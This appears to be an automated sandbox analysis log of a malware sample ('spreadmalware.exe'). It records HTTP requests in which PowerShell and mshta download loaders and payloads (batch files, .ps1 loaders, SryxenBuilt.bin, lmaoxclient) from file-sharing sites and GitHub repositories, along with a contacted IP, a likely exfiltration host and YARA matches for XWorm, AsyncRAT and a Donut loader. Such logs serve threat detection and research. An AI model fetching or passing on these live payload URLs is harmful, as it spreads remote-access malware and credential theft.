Source: unknown | TCP traffic detected without corresponding DNS query: 147.185.221.24 |
Source: unknown | TCP traffic detected without corresponding DNS query: 147.185.221.24 |
Source: unknown | TCP traffic detected without corresponding DNS query: 147.185.221.24 |
Source: unknown | TCP traffic detected without corresponding DNS query: 147.185.221.24 |
Source: unknown | TCP traffic detected without corresponding DNS query: 147.185.221.24 |
Source: unknown | TCP traffic detected without corresponding DNS query: 147.185.221.24 |
Source: unknown | TCP traffic detected without corresponding DNS query: 147.185.221.24 |
Source: unknown | TCP traffic detected without corresponding DNS query: 147.185.221.24 |
Source: unknown | TCP traffic detected without corresponding DNS query: 147.185.221.24 |
Source: unknown | TCP traffic detected without corresponding DNS query: 147.185.221.24 |
Source: unknown | TCP traffic detected without corresponding DNS query: 147.185.221.24 |
Source: unknown | TCP traffic detected without corresponding DNS query: 147.185.221.24 |
Source: unknown | TCP traffic detected without corresponding DNS query: 147.185.221.24 |
Source: unknown | TCP traffic detected without corresponding DNS query: 147.185.221.24 |
Source: unknown | TCP traffic detected without corresponding DNS query: 147.185.221.24 |
Source: unknown | TCP traffic detected without corresponding DNS query: 147.185.221.24 |
Source: unknown | TCP traffic detected without corresponding DNS query: 147.185.221.24 |
Source: unknown | TCP traffic detected without corresponding DNS query: 147.185.221.24 |
Source: unknown | TCP traffic detected without corresponding DNS query: 147.185.221.24 |
Source: unknown | TCP traffic detected without corresponding DNS query: 147.185.221.24 |
Source: unknown | TCP traffic detected without corresponding DNS query: 147.185.221.24 |
Source: unknown | TCP traffic detected without corresponding DNS query: 147.185.221.24 |
Source: unknown | TCP traffic detected without corresponding DNS query: 147.185.221.24 |
Source: unknown | TCP traffic detected without corresponding DNS query: 147.185.221.24 |
Source: unknown | TCP traffic detected without corresponding DNS query: 147.185.221.24 |
Source: unknown | TCP traffic detected without corresponding DNS query: 147.185.221.24 |
Source: unknown | TCP traffic detected without corresponding DNS query: 147.185.221.24 |
Source: unknown | TCP traffic detected without corresponding DNS query: 147.185.221.24 |
Source: unknown | TCP traffic detected without corresponding DNS query: 147.185.221.24 |
Source: unknown | TCP traffic detected without corresponding DNS query: 147.185.221.24 |
Source: unknown | TCP traffic detected without corresponding DNS query: 147.185.221.24 |
Source: unknown | TCP traffic detected without corresponding DNS query: 147.185.221.24 |
Source: unknown | TCP traffic detected without corresponding DNS query: 147.185.221.24 |
Source: unknown | TCP traffic detected without corresponding DNS query: 147.185.221.24 |
Source: unknown | TCP traffic detected without corresponding DNS query: 147.185.221.24 |
Source: unknown | TCP traffic detected without corresponding DNS query: 147.185.221.24 |
Source: unknown | TCP traffic detected without corresponding DNS query: 147.185.221.24 |
Source: unknown | TCP traffic detected without corresponding DNS query: 147.185.221.24 |
Source: unknown | TCP traffic detected without corresponding DNS query: 147.185.221.24 |
Source: unknown | TCP traffic detected without corresponding DNS query: 147.185.221.24 |
Source: unknown | TCP traffic detected without corresponding DNS query: 147.185.221.24 |
Source: unknown | TCP traffic detected without corresponding DNS query: 147.185.221.24 |
Source: unknown | TCP traffic detected without corresponding DNS query: 147.185.221.24 |
Source: unknown | TCP traffic detected without corresponding DNS query: 147.185.221.24 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: global traffic | HTTP traffic detected: GET /file/13a37f52caaf958b/serverrefsvc.exe HTTP/1.1Host: anonsharing.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /13a37f52caaf958b/serverrefsvc.exe?download_token=8be855a1d746c3a8742464b1eb0c0de41850bb5ec93884b730d3cb871a169aeb HTTP/1.1Host: anonsharing.com |
Source: global traffic | HTTP traffic detected: GET /raw/msdcgy3bxg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastejustit.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /file/db59849be6b5f562/skibiditoilet.bat HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: anonsharing.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /db59849be6b5f562/skibiditoilet.bat?download_token=a1e8551a275440a5e4f080f8e9763eec660cff556b920932c8cd94522d789e26 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: anonsharing.comCookie: filehosting=303b8e278dd1a3280483dd9d259be568 |
Source: global traffic | HTTP traffic detected: GET /anonsharing/b8/b8b4bfebdfac1d66be5d3c75dd4a06cf?response-content-disposition=filename%3Dskibiditoilet.bat&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=HSRJ9W5CR8WH0842044I%2F20250108%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250108T091510Z&X-Amz-SignedHeaders=host&X-Amz-Expires=10800&X-Amz-Signature=7c5db048caa31fbc29f2feb87c269054c605425e0927bffd5a06dd9b15d3b352 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: s3.ca-central-1.wasabisys.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /43a1723/test/main/download.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /43a1723/test/refs/heads/main/Mewing HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /43a1723/test/refs/heads/main/shellcode/loaderclient.ps1 HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /EvilBytecode/Sryxen/releases/download/v1.0.0/sryxen_loader.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /github-production-release-asset-2e65be/884985882/df985353-b412-45be-a5df-5d50a4ddaf53?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250108%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250108T091533Z&X-Amz-Expires=300&X-Amz-Signature=71849342e45026ae948e7cc8f90ab3779bcd14dee0966a571aa2cf9824444811&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dsryxen_loader.ps1&response-content-type=application%2Foctet-stream HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: objects.githubusercontent.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /43a1723/test/releases/download/siu/lmaoxclient HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /43a1723/test/main/download.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /EvilBytecode/Sryxen/releases/download/v1.0.0/SryxenBuilt.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.com |
Source: global traffic | HTTP traffic detected: GET /github-production-release-asset-2e65be/805647875/b2a5a7dc-5521-4d20-afaf-8cef231516e5?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250108%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250108T091534Z&X-Amz-Expires=300&X-Amz-Signature=9fdf61ee1f5b4e28977c1309ad3394caf7c66405c5945baf7eacf935f35496e5&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dlmaoxclient&response-content-type=application%2Foctet-stream HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: objects.githubusercontent.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /github-production-release-asset-2e65be/884985882/bd478a68-b939-4051-a1b9-cad0d16fddc3?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250108%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250108T091535Z&X-Amz-Expires=300&X-Amz-Signature=d56a35e8a02c4927d06631767194b22bca897731c61334d3f71d41626b4986d9&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3DSryxenBuilt.bin&response-content-type=application%2Foctet-stream HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: objects.githubusercontent.com |
Source: global traffic | HTTP traffic detected: GET /43a1723/test/refs/heads/main/Mewing HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /43a1723/test/refs/heads/main/shellcode/loaderclient.ps1 HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /EvilBytecode/Sryxen/releases/download/v1.0.0/sryxen_loader.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /43a1723/test/releases/download/siu/lmaoxclient HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /github-production-release-asset-2e65be/884985882/df985353-b412-45be-a5df-5d50a4ddaf53?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250108%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250108T091533Z&X-Amz-Expires=300&X-Amz-Signature=71849342e45026ae948e7cc8f90ab3779bcd14dee0966a571aa2cf9824444811&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dsryxen_loader.ps1&response-content-type=application%2Foctet-stream HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: objects.githubusercontent.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /github-production-release-asset-2e65be/805647875/b2a5a7dc-5521-4d20-afaf-8cef231516e5?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250108%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250108T091534Z&X-Amz-Expires=300&X-Amz-Signature=9fdf61ee1f5b4e28977c1309ad3394caf7c66405c5945baf7eacf935f35496e5&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dlmaoxclient&response-content-type=application%2Foctet-stream HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: objects.githubusercontent.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /EvilBytecode/Sryxen/releases/download/v1.0.0/SryxenBuilt.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.com |
Source: global traffic | HTTP traffic detected: GET /github-production-release-asset-2e65be/884985882/bd478a68-b939-4051-a1b9-cad0d16fddc3?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250108%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250108T091535Z&X-Amz-Expires=300&X-Amz-Signature=d56a35e8a02c4927d06631767194b22bca897731c61334d3f71d41626b4986d9&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3DSryxenBuilt.bin&response-content-type=application%2Foctet-stream HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: objects.githubusercontent.com |
Source: global traffic | HTTP traffic detected: GET /43a1723/test/main/Ip HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive |
Source: spreadmalware.exe, 00000001.00000002.1292529153.00000000029E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anonsharing.com |
Source: spreadmalware.exe, 00000001.00000002.1292529153.0000000002A67000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ca-central-1.wasabisys.com |
Source: powershell.exe, 00000029.00000002.1905889415.0000016D1B7AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.1905889415.0000016D1B869000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1811615016.000002B200BC3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://github.com |
Source: powershell.exe, 00000029.00000002.1870747846.000000C00017E000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://localhost:9222taskkill.jsC: |
Source: powershell.exe, 00000029.00000002.1905889415.0000016D1BAA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2054332439.0000016D2A245000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000029.00000002.1905889415.0000016D1B7FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1811615016.000002B200C25000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://objects.githubusercontent.com |
Source: powershell.exe, 00000029.00000002.1905889415.0000016D1A3F6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000033.00000002.1811615016.000002B200AA8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://raw.githubusercontent.com |
Source: spreadmalware.exe, 00000001.00000002.1292529153.0000000002A67000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://s3.ca-central-1.wasabisys.com |
Source: powershell.exe, 0000002E.00000002.1647029788.000002DE016C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/ |
Source: spreadmalware.exe, 00000001.00000002.1292529153.00000000029C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.1905889415.0000016D1A1D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.1647029788.000002DE01491000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1811615016.000002B20003F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 0000002E.00000002.1647029788.000002DE016C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/ |
Source: powershell.exe, 00000029.00000002.1905889415.0000016D1B869000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0 |
Source: powershell.exe, 00000029.00000002.1905889415.0000016D1A3F6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000029.00000002.1905889415.0000016D1A1D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.1647029788.000002DE01491000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1811615016.000002B200063000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1811615016.000002B20003F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68 |
Source: spreadmalware.exe, 00000001.00000002.1292529153.0000000002A67000.00000004.00000800.00020000.00000000.sdmp, spreadmalware.exe, 00000001.00000002.1292529153.00000000029C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://anonsharing.com |
Source: spreadmalware.exe, 00000001.00000002.1292529153.0000000002A07000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://anonsharing.com( |
Source: spreadmalware.exe, 00000001.00000002.1292529153.00000000029E2000.00000004.00000800.00020000.00000000.sdmp, spreadmalware.exe, 00000001.00000002.1292529153.0000000002A03000.00000004.00000800.00020000.00000000.sdmp, spreadmalware.exe, 00000001.00000002.1292529153.0000000002A07000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://anonsharing.com/13a37f52caaf958b/serverrefsvc.exe?download_token=8be855a1d746c3a8742464b1eb0 |
Source: spreadmalware.exe, 00000001.00000002.1292529153.00000000029C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://anonsharing.com/file/13a37f52caaf958b/serverrefsvc.exe |
Source: powershell.exe, 00000029.00000002.2054332439.0000016D2A245000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000029.00000002.2054332439.0000016D2A245000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000029.00000002.2054332439.0000016D2A245000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License |
Source: svchost.exe, 0000004B.00000003.1768359017.0000015D23849000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://g.live.com/odclientsettings/Prod1C: |
Source: powershell.exe, 00000029.00000002.1905889415.0000016D1B3D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.1905889415.0000016D1B869000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.1905889415.0000016D1A3F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1811615016.000002B200ACD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com |
Source: powershell.exe, 00000033.00000002.1811615016.000002B200ACD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/43a1723/test/releases/download/siu/lmaoxclienX |
Source: powershell.exe, 00000033.00000002.1811615016.000002B200ACD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/43a1723/test/releases/download/siu/lmaoxclient |
Source: powershell.exe, 00000029.00000002.1905889415.0000016D1A5E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.1905889415.0000016D1A5DE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/EvilBytecode/Sryxen/releases/download/v1.0.0/SryxenBuilt.bin |
Source: powershell.exe, 00000029.00000002.1905889415.0000016D1B869000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/EvilBytecode/Sryxen/releases/download/v1.0.0/X |
Source: powershell.exe, 00000029.00000002.1901021615.0000016D184F8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.1905889415.0000016D1A3F6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/EvilBytecode/Sryxen/releases/download/v1.0.0/sryxen_loader.ps1 |
Source: powershell.exe, 00000029.00000002.1905889415.0000016D1A3F6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000029.00000002.1904552282.0000016D187D4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/evilbytecode/sryxen/releases/download/v1.0.0/sryxen_loader.ps1 |
Source: powershell.exe, 00000029.00000002.1905889415.0000016D1B3D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1811615016.000002B20050D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000029.00000002.1905889415.0000016D1BAA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2054332439.0000016D2A245000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000029.00000002.1905889415.0000016D1A57B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.1905889415.0000016D1B869000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.1905889415.0000016D1B7D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1811615016.000002B200C25000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://objects.githubusercontent.com |
Source: powershell.exe, 00000033.00000002.1811615016.000002B200BC3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://objects.githubusercontent.com/github-production-release-asset-2e65be/805647875/b2a5a7dc-5521 |
Source: powershell.exe, 00000029.00000002.1905889415.0000016D1B869000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.1905889415.0000016D1A5E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://objects.githubusercontent.com/github-production-release-asset-2e65be/884985882/bd478a68-b939 |
Source: powershell.exe, 00000029.00000002.1905889415.0000016D1A55D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.1905889415.0000016D1B7AA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://objects.githubusercontent.com/github-production-release-asset-2e65be/884985882/df985353-b412 |
Source: powershell.exe, 00000029.00000002.1905889415.0000016D1B7D7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://objects.githubuserconth |
Source: powershell.exe, 00000029.00000002.1905889415.0000016D1B869000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.org |
Source: powershell.exe, 00000029.00000002.1905889415.0000016D1B869000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.orgX |
Source: spreadmalware.exe, 00000001.00000002.1293213738.000000001B97C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://pastejustit.com/raw/msdcgy3bxg |
Source: powershell.exe, 00000033.00000002.1811615016.000002B2004AE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.gith |
Source: powershell.exe, 00000033.00000002.1811615016.000002B2007E0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com |
Source: powershell.exe, 00000033.00000002.1811615016.000002B2014FE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/43a1723/test/main/Ip |
Source: mshta.exe, 0000001B.00000002.1488443583.000001C85E520000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/43a1723/test/main/download. |
Source: mshta.exe, 00000021.00000002.1585562631.000002597AB3F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/43a1723/test/main/download.ps1 |
Source: powershell.exe, 00000033.00000002.1811615016.000002B20008A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/43a1723/test/refs/heads/main/shellcode/loaderclient.ps1 |
Source: spreadmalware.exe, 00000001.00000002.1292529153.0000000002A67000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://s3.ca-central-1.wasabisys.com |
Source: spreadmalware.exe, 00000001.00000002.1292529153.0000000002A67000.00000004.00000800.00020000.00000000.sdmp, spreadmalware.exe, 00000001.00000002.1292529153.00000000029FF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://s3.ca-central-1.wasabisys.com/anonsharing/9c/9c2dfd66df63d4dc503e26f209bb1294?response-conte |
Source: powershell.exe, 00000029.00000002.1870747846.000000C00007B000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://sigma.dreamhosters.com/ |
Source: powershell.exe, 00000029.00000002.1870747846.000000C00007B000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://sigma.dreamhosters.com/C: |
Source: powershell.exe, 00000029.00000002.1870747846.000000C00007B000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://sigma.dreamhosters.com/User-Agent: |
Source: powershell.exe, 00000029.00000002.1870747846.000000C00029C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://sigma.drform-data; |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49700 |
Source: unknown | Network traffic detected: HTTP traffic on port 49699 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49863 |
Source: unknown | Network traffic detected: HTTP traffic on port 49945 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50010 |
Source: unknown | Network traffic detected: HTTP traffic on port 49859 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49875 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49795 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49939 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49701 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49939 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49938 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49859 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49936 |
Source: unknown | Network traffic detected: HTTP traffic on port 49849 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49856 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49855 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49699 |
Source: unknown | Network traffic detected: HTTP traffic on port 50010 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49936 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49855 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 50000 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49700 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49849 |
Source: unknown | Network traffic detected: HTTP traffic on port 49848 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49848 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49847 |
Source: unknown | Network traffic detected: HTTP traffic on port 49869 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49963 |
Source: unknown | Network traffic detected: HTTP traffic on port 49863 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49702 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 50005 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49963 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49847 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49955 |
Source: unknown | Network traffic detected: HTTP traffic on port 49948 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49875 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49952 |
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49795 |
Source: unknown | Network traffic detected: HTTP traffic on port 49952 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50000 |
Source: unknown | Network traffic detected: HTTP traffic on port 49856 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50005 |
Source: unknown | Network traffic detected: HTTP traffic on port 49938 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49955 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49948 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49869 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49945 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49702 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49701 |
Source: sslproxydump.pcap, type: PCAP | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown |
Source: 51.2.powershell.exe.2b2016349c0.0.raw.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io |
Source: 51.2.powershell.exe.2b2016349c0.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: 51.2.powershell.exe.2b268dd0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io |
Source: 51.2.powershell.exe.2b268dd0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: 51.2.powershell.exe.2b268dd0000.1.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io |
Source: 51.2.powershell.exe.2b268dd0000.1.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: 51.2.powershell.exe.2b2016349c0.0.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io |
